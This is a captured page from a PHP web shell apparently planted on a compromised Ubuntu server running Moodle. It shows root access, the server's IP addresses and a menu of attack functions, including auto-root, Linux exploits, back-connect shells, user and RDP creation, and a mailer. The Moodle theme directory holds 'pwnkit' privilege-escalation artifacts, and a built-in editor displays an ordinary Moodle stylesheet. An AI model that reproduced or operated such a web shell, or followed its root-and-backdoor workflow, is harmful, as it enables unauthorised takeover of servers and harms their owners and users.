Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
theme /
boost /
scss /
moodle /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.scss
12.49
KB
-rwxrwxrwx
atto.scss
4.23
KB
-rwxrwxrwx
backup-restore.scss
4.16
KB
-rwxrwxrwx
blocks.scss
8.18
KB
-rwxrwxrwx
bootstrap-rtl.scss
793
B
-rwxrwxrwx
bootswatch.scss
174
B
-rwxrwxrwx
bs2-compat.scss
1.26
KB
-rwxrwxrwx
bs4alphacompat.scss
6.22
KB
-rwxrwxrwx
buttons.scss
1.8
KB
-rwxrwxrwx
calendar.scss
12.58
KB
-rwxrwxrwx
chat.scss
2.25
KB
-rwxrwxrwx
contentbank.scss
2.7
KB
-rwxrwxrwx
core.scss
49.99
KB
-rwxrwxrwx
course.scss
23.64
KB
-rwxrwxrwx
dashboard.scss
144
B
-rwxrwxrwx
debug.scss
1.78
KB
-rwxrwxrwx
drawer.scss
3.93
KB
-rwxrwxrwx
editor.scss
62
B
-rwxrwxrwx
expendable.scss
826
B
-rwxrwxrwx
filemanager.scss
19.94
KB
-rwxrwxrwx
forms.scss
10.96
KB
-rwxrwxrwx
grade.scss
8.92
KB
-rwxrwxrwx
icons.scss
2.28
KB
-rwxrwxrwx
layout.scss
733
B
-rwxrwxrwx
login.scss
167
B
-rwxrwxrwx
message.scss
16.13
KB
-rwxrwxrwx
modal.scss
389
B
-rwxrwxrwx
modules.scss
36.88
KB
-rwxrwxrwx
popover-region.scss
9.93
KB
-rwxrwxrwx
print.scss
312
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question.scss
12.37
KB
-rwxrwxrwx
reports.scss
550
B
-rwxrwxrwx
search.scss
1.28
KB
-rwxrwxrwx
sticky-footer.scss
403
B
-rwxrwxrwx
tables.scss
1.38
KB
-rwxrwxrwx
templates.scss
238
B
-rwxrwxrwx
tool_usertours.scss
3.42
KB
-rwxrwxrwx
undo.scss
7.73
KB
-rwxrwxrwx
user.scss
5.09
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : popover-region.scss
$toggle-width: 25px; $standard-border: 1px solid #ddd; $region-container-height: 500px; $region-container-width: 380px; $region-container-z-index: 1; $region-header-height: 25px; $region-footer-height: 30px; $content-item-hover-colour-bg: #79b5e6; $content-item-hover-colour-text: #fff; $content-item-selected-colour-bg: #4f94cd; $content-item-unread-colour: #f4f4f4; $content-header-footer-height: $region-header-height + $region-footer-height; @mixin invisible() { opacity: 0; visibility: hidden; } @mixin visible() { opacity: 1; visibility: visible; } .popover-region { position: relative; &.collapsed { .popover-region-toggle { &:before, &:after { display: none; } } .popover-region-container { @include invisible(); height: 0; overflow: hidden; transition: height 0.25s, opacity 101ms 0.25s, visibility 101ms 0.25s; } } } .popover-region-toggle { cursor: pointer; &::before { content: ''; display: inline-block; border-left: 10px solid transparent; border-right: 10px solid transparent; border-bottom: 10px solid #ddd; position: absolute; bottom: 0; right: 7px; } &::after { content: ''; display: inline-block; border-left: 9px solid transparent; border-right: 9px solid transparent; border-bottom: 9px solid #fff; position: absolute; bottom: -1px; right: 8px; z-index: $region-container-z-index + 1; } } .count-container { padding: 2px; border-radius: 2px; background-color: red; color: white; font-size: 11px; line-height: 11px; position: absolute; top: 5px; right: 0; } .popover-region-container { @include visible(); position: absolute; right: 0; top: 0; height: $region-container-height; width: $region-container-width; border: $standard-border; transition: height 0.25s; background-color: #fff; z-index: $region-container-z-index; } .popover-region-header-container { height: $region-header-height; line-height: $region-header-height; padding-left: 5px; padding-right: 5px; border-bottom: $standard-border; box-sizing: border-box; } .popover-region-footer-container { height: $region-footer-height; text-align: center; border-top: $standard-border; background-color: $popover-bg; padding-top: 3px; } .popover-region-header-text { float: left; margin: 0; font-size: 14px; line-height: $region-header-height; } .popover-region-header-actions { float: right; > * { margin-left: 10px; min-width: 20px; display: inline-block; } .loading-icon { display: none; height: 12px; width: 12px; } .newmessage-link { margin-right: 10px; } label { display: inline-block; text-align: center; margin-bottom: 0; } } .popover-region-content-container { height: calc(100% - #{$content-header-footer-height}); width: 100%; overflow-y: auto; -webkit-overflow-scrolling: touch; > .loading-icon { display: none; text-align: center; padding: 5px; box-sizing: border-box; } .empty-message { display: none; text-align: center; padding: 10px; } &.loading { > .loading-icon { display: block; } .empty-message { display: none; } } } .navbar { .popover-region { float: left; margin-right: 10px; &.collapsed { .popover-region-container { @include invisible(); height: 0; overflow: hidden; transition: height 0.25s, opacity 101ms 0.25s, visibility 101ms 0.25s; } } } .popover-region-toggle { width: $toggle-width; } .count-container { padding: 2px; border-radius: 2px; background-color: red; color: white; font-size: 11px; line-height: 11px; position: absolute; top: 5px; right: 0; } .popover-region-container { top: $line-height-base * 1.4 * $font-size-base; } } .content-item-container { width: 100%; border-bottom: $standard-border; box-sizing: border-box; padding: 5px; position: relative; margin: 0; display: block; color: inherit; text-decoration: none; &:hover { color: $content-item-hover-colour-text; background-color: $content-item-hover-colour-bg; .content-item-footer { .timestamp { color: $content-item-hover-colour-text; } } } &.unread { margin: 0; background-color: $content-item-unread-colour; &:hover { color: $content-item-hover-colour-text; background-color: $content-item-hover-colour-bg; } .content-item-body { .notification-message { font-weight: 600; } } } .context-link { color: inherit; text-decoration: none; } .content-item-body { box-sizing: border-box; margin-bottom: 5px; } .content-item-footer { text-align: left; box-sizing: border-box; .timestamp { font-size: 10px; line-height: 10px; margin: 0; color: #666; margin-left: 24px; } } .view-more { position: absolute; bottom: 5px; right: 5px; font-size: 12px; line-height: 12px; } &.notification { .content-item-body { .notification-image { display: inline-block; width: 24px; height: 24px; float: left; img { height: 75%; } } .notification-message { display: inline-block; font-size: 12px; width: calc(100% - 24px); } } } &.selected { background-color: $content-item-selected-colour-bg; color: $content-item-hover-colour-text; border-color: $content-item-selected-colour-bg; .content-item-footer { .timestamp { color: $content-item-hover-colour-text; } } } } .popover-region-notifications { .popover-region-header-container { .mark-all-read-button { .normal-icon { display: inline-block; } &.loading { .normal-icon { display: none; } .loading-icon { display: inline-block; } } } } .all-notifications { @include visible(); height: auto; overflow: hidden; &:empty + .empty-message { display: block; } } .notification-image { display: inline-block; width: 8%; vertical-align: top; img { height: 75%; } } .notification-message { display: inline-block; font-size: 12px; } .popover-region-content-container { &.loading { .all-notifications { &:empty + .empty-message { display: none; } } } } } .popover-region-messages { .mark-all-read-button { .normal-icon { display: inline-block; } &.loading { .normal-icon { display: none; } .loading-icon { display: inline-block; } } } .popover-region-content-container { &.loading { .popover-region-content { .messages { &:empty + .empty-message { display: none; } } } } } .messages { &:empty + .empty-message { display: block; } } .content-item-container { &.unread { .content-item-body { font-weight: 600; width: calc(90% - 30px); } .unread-count-container { display: inline-block; width: 10%; text-align: center; float: right; } } } .content-item { height: 100%; width: 100%; box-sizing: border-box; } .profile-image-container { width: 30px; display: inline-block; text-align: center; float: left; img { width: 100%; display: inline-block; vertical-align: middle; border-radius: 50%; } } .content-item-body { display: inline-block; box-sizing: border-box; width: calc(100% - 30px); font-size: 12px; padding-left: 10px; overflow: hidden; h3 { font-size: 12px; line-height: 12px; margin: 0; width: 100%; } p { margin: 0; } } .unread-count-container { display: none; } } @media (max-width: 767px) { .navbar { .popover-region { .popover-region-container { right: -70px; } } } } @media (max-width: 480px) { .navbar { .popover-region { .popover-region-container { position: fixed; top: 46px; right: 0; left: 0; bottom: 0; width: auto; height: auto; } } } }
Close